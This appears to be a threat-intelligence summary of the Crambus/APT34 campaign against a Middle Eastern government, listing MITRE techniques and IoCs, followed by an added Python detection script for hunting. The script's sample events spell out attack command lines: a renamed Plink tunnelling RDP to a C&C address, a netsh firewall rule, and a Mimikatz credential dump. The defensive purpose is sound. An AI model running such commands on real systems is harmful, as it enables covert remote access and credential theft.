Crambus (OilRig/APT34) conducted an eight-month intrusion against a Middle Eastern government in early 2023, stealing files, passwords, and emails while deploying backdoors and credential dumping tools. The operation relied on PowerShell backdoors (PowerExchange), Plink-based port-forwarding for RDP, and living-off-the-land techniques to maintain access. #Crambus #PowerExchange
Keypoints
- The Iranian espionage group Crambus staged an eight-month intrusion against a Middle Eastern government between February and September 2023, compromising at least 12 computers and likely more.
- Crambus deployed multiple malware components (Backdoor.Tokel, Trojan.Dirps, Infostealer.Clipog, Backdoor.PowerExchange, Mimikatz) plus Plink and other living-off-the-land tools to maintain access and collect data.
- Backdoor.PowerExchange uses a compromised Exchange Server as a C2, monitoring for attacker emails and executing PowerShell commands based on special email triggers.
- Attackers frequently used Plink to configure port forwarding, enabling remote access via RDP and advancing lateral movement across the network.
- The campaign included extensive credential theft (Mimikatz), network connection discovery (netstat), and Windows firewall rule modifications to facilitate remote access.
- The operators engaged in email harvesting via PowerShell-driven workflows and custom Exchange rules to exfiltrate data and operate covertly within the environment.
- Crambus is described as a long-running threat with a history of socially engineered initial access and ongoing activity in the Middle East and beyond.
MITRE Techniques
- [T1059.001] Command and Scripting Interpreter: PowerShell – “PowerShell-based malware that can log into an Exchange Server with hardcoded credentials and monitor for emails sent by the attackers. It uses an Exchange Server as a C&C.”
- [T1021.001] Remote Services: Remote Desktop Protocol – “port-forwarding rules on compromised machines, enabling remote access via the Remote Desktop Protocol (RDP).”
- [T1049] System Network Connections Discovery – “netstat commands to retrieve a full list of all TCP and UDP connections.”
- [T1036] Masquerading – “a renamed version of Plink (msssh.exe), a command-line connection tool for the PuTTY SSH client, was used to configure port-forwarding rules…”
- [T1027] Obfuscated Files and Information – “The C&C address is stored in a separate, RC4 encrypted file called token.bin.”
- [T1562.004] Impair Defenses: Disable or Modify System Firewall – “modified Windows firewall rules in order to enable remote access.”
- [T1047] Windows Management Instrumentation – “WMI (Windows Management Instrumentation) was used to execute Plink in order to open port-forwarding…”
- [T1003] OS Credential Dumping – “Mimikatz was executed from the %TEMP% directory to dump credentials.”
Indicators of Compromise
- [File hash] – Backdoor.Tokel – 4d04ad9d3c3abeb61668e52a52a37a46c1a60bc8f29f12b76ff9f580caeefba8, 41672b08e6e49231aedf58123a46ed7334cafaad054f2fd5b1e0c1d5519fd532
- [File hash] – Trojan.Dirps – 497e1c76ed43bcf334557c64e1a9213976cd7df159d695dcc19c1ca3d421b9bc
- [File hash] – Infostealer.Clipog – 75878356f2e131cefb8aeb07e777fcc110475f8c92417fcade97e207a94ac372
- [File hash] – Backdoor.PowerExchange – d884b3178fc97d1077a13d47aadf63081559817f499163c2dc29f6828ee08cae
- [IP address] – Plink C&C – 78.47.218.106, 192.121.22.46, 151.236.19.91, 91.132.92.90
- [File name] – Telecomm.exe (Backdoor.Tokel), msssh.exe (masqueraded Plink)
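The techniques and indicators above translate directly into host-level hunting logic. The script below is an added example, not code from the Symantec report or from any tool the summary names: it classifies Sysmon Event ID 1 style process-creation records (fields named after Sysmon's Image, CommandLine, ParentImage, OriginalFileName and Hashes) against the Crambus behaviours listed under MITRE Techniques (renamed Plink, Plink RDP port-forwarding launched via WMI, netsh firewall changes, Mimikatz from %TEMP%, netstat) and against the file hashes and Plink C&C addresses listed under Indicators of Compromise. The sample events are constructed for the example; the hashes and IP addresses are the ones on this page.

```python
"""Hunting example (added, not from the report): classify process-creation events
against the Crambus tradecraft and IoCs summarised above.  Event fields mirror
Sysmon Event ID 1; every sample event is constructed, not captured."""
import re
from dataclasses import dataclass

# SHA-256 hashes and Plink C&C addresses from the Indicators of Compromise list.
IOC_SHA256 = {
    "4d04ad9d3c3abeb61668e52a52a37a46c1a60bc8f29f12b76ff9f580caeefba8": "Backdoor.Tokel",
    "41672b08e6e49231aedf58123a46ed7334cafaad054f2fd5b1e0c1d5519fd532": "Backdoor.Tokel",
    "497e1c76ed43bcf334557c64e1a9213976cd7df159d695dcc19c1ca3d421b9bc": "Trojan.Dirps",
    "75878356f2e131cefb8aeb07e777fcc110475f8c92417fcade97e207a94ac372": "Infostealer.Clipog",
    "d884b3178fc97d1077a13d47aadf63081559817f499163c2dc29f6828ee08cae": "Backdoor.PowerExchange",
}
IOC_IPS = {"78.47.218.106", "192.121.22.46", "151.236.19.91", "91.132.92.90"}


@dataclass
class ProcessEvent:
    image: str                    # full path of the started process (Sysmon Image)
    command_line: str             # Sysmon CommandLine
    parent_image: str             # Sysmon ParentImage
    original_file_name: str = ""  # PE version-info name Sysmon logs as OriginalFileName
    sha256: str = ""              # SHA256 taken from the Sysmon Hashes field


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> list:
    """Return the technique / IoC labels that match one event (empty list if benign)."""
    hits = []
    name = _basename(ev.image)
    parent = _basename(ev.parent_image)
    cmd = ev.command_line.lower()
    orig = ev.original_file_name.lower()
    is_plink = orig == "plink.exe" or name in {"plink.exe", "msssh.exe"}

    # T1036: the PE still identifies itself as plink.exe but sits on disk under another name.
    if orig == "plink.exe" and name != "plink.exe":
        hits.append("T1036 renamed Plink")
    # T1021.001: Plink -R/-L port-forward whose endpoint is RDP (3389); case folded above.
    if is_plink and re.search(r"\s-[rl]\s+\S*:3389\b", cmd):
        hits.append("T1021.001 Plink port-forward to RDP")
    # T1047: Plink launched through WMI, i.e. parented by WmiPrvSE.exe.
    if is_plink and parent == "wmiprvse.exe":
        hits.append("T1047 Plink spawned by WMI")
    # T1562.004: netsh adding or changing a firewall rule.
    if name == "netsh.exe" and re.search(r"firewall.*\b(add|set)\b", cmd):
        hits.append("T1562.004 firewall rule modification")
    # T1003: Mimikatz by binary name or module syntax; note when it runs from a Temp directory.
    if name == "mimikatz.exe" or "sekurlsa::" in cmd:
        where = " from TEMP" if "\\temp\\" in ev.image.lower() else ""
        hits.append("T1003 Mimikatz" + where)
    # T1049: netstat is weak on its own; kept so it can be correlated with the hits above.
    if name == "netstat.exe":
        hits.append("T1049 netstat")
    # Any listed C&C address in the command line (e.g. the Plink target host).
    for ip in re.findall(r"\b\d{1,3}(?:\.\d{1,3}){3}\b", cmd):
        if ip in IOC_IPS:
            hits.append(f"IOC ip {ip}")
    if ev.sha256.lower() in IOC_SHA256:
        hits.append(f"IOC hash {IOC_SHA256[ev.sha256.lower()]}")
    return hits


def hunt(events) -> dict:
    """Map event index -> labels for every event that produced at least one hit."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}


# Constructed sample events (paths, user names and the [redacted] password are invented).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Users\Public\msssh.exe",
                 r"msssh.exe -N -R 0.0.0.0:8080:127.0.0.1:3389 -pw [redacted] user@78.47.218.106",
                 r"C:\Windows\System32\wbem\WmiPrvSE.exe", original_file_name="Plink.exe"),
    ProcessEvent(r"C:\Windows\System32\netsh.exe",
                 'netsh advfirewall firewall add rule name="Remote" dir=in action=allow '
                 'protocol=TCP localport=3389', r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Users\admin\AppData\Local\Temp\m.exe",
                 'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\netstat.exe", "netstat -ano",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\ProgramData\Telecomm.exe", "Telecomm.exe", r"C:\Windows\explorer.exe",
                 sha256="4d04ad9d3c3abeb61668e52a52a37a46c1a60bc8f29f12b76ff9f580caeefba8"),
    # Legitimate, correctly named Plink session with no forwarding: should produce no hit.
    ProcessEvent(r"C:\Program Files\PuTTY\plink.exe", "plink.exe -ssh admin@10.0.0.5 uptime",
                 r"C:\Windows\System32\cmd.exe", original_file_name="Plink.exe"),
]

if __name__ == "__main__":
    for idx, labels in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, labels)
```

The OriginalFileName check is what catches the msssh.exe rename regardless of the hash, so keep Sysmon's version-info fields enabled; the IoC hash and IP sets are the weakest signals here, since the group can rotate both, whereas a Plink process parented by WmiPrvSE.exe with an -R forward to port 3389 is behaviour worth alerting on anywhere in the estate.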